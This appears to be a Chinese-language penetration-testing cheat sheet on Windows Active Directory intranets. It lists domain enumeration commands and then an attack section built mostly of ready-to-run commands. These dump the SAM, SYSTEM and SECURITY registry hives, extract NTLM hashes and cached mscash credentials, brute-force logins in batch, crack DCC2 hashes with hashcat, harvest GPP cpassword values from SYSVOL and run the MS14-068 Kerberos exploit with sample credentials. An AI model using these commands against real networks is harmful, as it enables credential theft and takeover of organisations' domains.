Intranet Introduction
内网基础入门
内网入门
基本介绍与信息获取
基本介绍
c:\windows\NTDS 全称ntds.dit(存储域内账户hash)
C:\Windows\system32\config\ SAM Hash 存储windows用户hash
c:\windows\SYSOL Sysvol文件夹
Administrator 用户 管理计算机(域)的内置账户
Domain Admins 指定的域管理员
Domain Computers 加入到域中的所有工作站和服务器
Domain Controllers 域中所有域控制器
Domain Guests 域的所有来宾
Domain Users 所有域用户
Enterprise Admins 企业的指定系统管理员(加入可以访问任何域资源)
krbtgt 服务账户(密钥分发中心&&不可以登陆)
\\domain\Netlogon目录 这个目录里存放的是域用户登录脚本,很多用户目录映射、打印机设置等操作的脚本都放在这里,这个目录是普通域用户权限就可读的。大部分时间能获得各个部门的共享文件夹,文件服务器目录,运气好时甚至能得到一些账号密码
基础信息获取
net user /domain 域用户
net Administrator /domain 域管理员
net user 本机用户
net localhroup administrators 本机管理员[通常含有域用户]
net group /domain 查询域工作组
net group "domain admins" /domain 查询域管理员用户组
net localgroup administrators /domain 登录本机的域管理员
net localgroup administrators workgroup\user001 /add 域用户添加到本机
net group "Domain controllers" 查看域控制器(如果有多台)
net group “enterprise admins” /domain 获得企业管理员列表
net localgroup administrators /domain 获取域内置administrators组用户,这个组内成员包含enterprise admins与domain admins,权限一样
net group “domain controllers” /domain 获得域控制器列表
net group “domain computers” /domain 获得所有域成员计算机列表
net user someuser /domain 获得指定账户someuser的详细信息
net accounts /domain 获得域密码策略设置,密码长短,错误锁定等信息
nltest /domain_trusts 获取域信任信息
ipconfig /all 查询本机IP段,所在域等
net view 查询同一域内机器列表
net view /domain 查询域列表
net config workstation 判断是否在域内
systeminfo 判断是否在域内
net view /domain:domainname 查看workgroup域中计算机列表
net time /domain 判断主域,主域服务器都做时间服务器
net config workstation 当前登录域
net session 查看当前会话
net use \\ip\ipc$ pawword /user:username 建立IPC会话[空连接]
net share 查看SMB指向的路径[即共享]
net view 查询同一域内机器列表
net view \\ip 查询某IP共享
net view /domain 查询域列表
net view /domain:domainname 查看workgroup域中计算机列表
net start 查看当前运行的服务
net accounts 查看本地密码策略
net accounts /domain 查看域密码策略
nbtstat –A ip netbios 查询
netstat –an/ano/anb 网络连接查询
route print 路由表
详细信息获取
ldifde -u -f output.ldf 导出域内所有信息
csvde -u -f ouput.csv 导出域内所有信息
csvde.exe/ldifde.exe -u -r "(sAMAccountType=805306368)" -l sAMAccountName,displayname,lastlogon,pwdLastSet,description,mail,homedirectory,scriptpath -f output.csv 查询所有用户
dsquery computer获得域内所有计算机列表,输出为DN
dsquery server 获得所有域控制器
dsquery user 获得所有域用户
dsquery user | dsget user -samid -display -email 获得所有域用户
dsquery group 获得所有用户组
dsquery subnet 获得所有子网
dsquery site 获得所有站点
dsquery * forestroot -filter "(sAMAccountType=805306368)" -attr sAMAccountName displaynamedescription
查询所有用户
AdFind.exe -default -f "(sAMAccountType=805306368)" sAMAccountName displayname lastlogon pwdLastSet mail homedirectory scriptpath -int8time lastlogon;pwdlastset 所有用户信息
非域成员访问域控制器
csvde/ldifde -s servername -b username Domain password -f output.txt
dsquery * forestroot -s servername -u username -p password -filter "(sAMAccountType=805306368)" -attr sAMAccountName displayname description
adfind -h servername -u Domai\usernmae -up password -default -f "(sAMAccountType=805306368)" sAMAccountName displayname lastlogon pwdLastSet mail homedirectory scriptpath -int8time lastlogon;pwdlastset
winfo
winfo 192.168.1.4 查看其他机器信息
常见攻击方法
用户登陆迭代
导出注册表
reg save hklm\sam sam.hive & reg save hklm\system system.hive & reg save hklm\security security.hive 导出注册表
导出hash
pwdump.py system.hive sam.hive https://github.com/Neohapsis/creddump7
破解hash
http://www.hashkiller.co.uk/ntlm-decrypter.aspx
收集服务器
dsquery * -filter "&(sAMAccountType=805306369)" -attr cn 收集所有计算机
dsquery * -filter "&(sAMAccountType=805306369)(OperatingSystem=*server*)" -attr cn 收集服务器
尝试批量登陆
LoginTester.bat https://github.com/Twi1ight/AD-Pentest-Script
-s指定机器名列表 -i指定ip地址段,暂时只支持C段,ip地址格式形如192.168.1.5-250 -u指定账号密码文件,账号密码用冒号分隔 -o指定输出文件 -d指定域名,如果账号只本地用户则不需要指定这个参数
logintester.bat -s server.txt -u server.txt -o output.txt
域登录缓存mscash
导出注册表
reg save hklm\sam sam.hive & reg save hklm\system system.hive & reg save hklm\security security.hive 导出注册表
Creddump7提取mscash
cachedump.py system.hive securityhive true (2003 false)
查看用户状态
net user username /domain
ldifde.exe -u -r "(sAMAccountName=adminjk)" -l pwdLastSet -s pdc.test.ad -b john test.ad Passw0rd. -f out.txt w32tm /ntte 130XXXXXXX 查询完使用w32tm转化时间格式
AdFind.exe -u pdc.test.ad -u test.ad\john -up Passw0rd. -default -f "(sAMAccountName=adminjk)" pwdLastSet userAccountControl -int8time pwdLastSet
userAccountControl AD 用户属性userAccountControl的详细解释 userAccountControl
hashcat跑密码
hashcat -a 3 -m 2100 --force ‘$DCC2$10240#adminjk#259108604cb524e8c044d5cda274bae1’
GPP(组策略漏洞)
受影响文件 Groups.xml, Services\Services.xml ScheduledTasks\ScheduledTasks.xml Printers\Printers.xml Drives\Drives.xml DataSources\DataSources.xml
文件中查找类似的字符串 cpassword=“j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw”
查看SYSVOL目录
net view \\域控制器
测试是否有访问权限
dir \\域控制器\sysvol
查找危险文件
dir \\域控制器\sysvol /s /a >sysvol.txt
查看危险文件内容
type \\域控制器\sysvol\文件名
脚本解密
MS14-68 kerberos
可以参考我的另一篇文章
IPC MS14068 Pth Ptt Ptk Kerberoating
域用户获取sid whoami /user
本地用户获取sid dsquery user –s 192.168.1.111 –u test\john –p Passw0rd. –name john* | dsget user –s 192.168.1.111 –u test\john –p Passw0rd. –sid
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
ms14-068.py -u john@test.ad -s S-1-5-21-1729408145-521730468-1409314830-1104 -d 192.168.1.111 -p Passw0rd.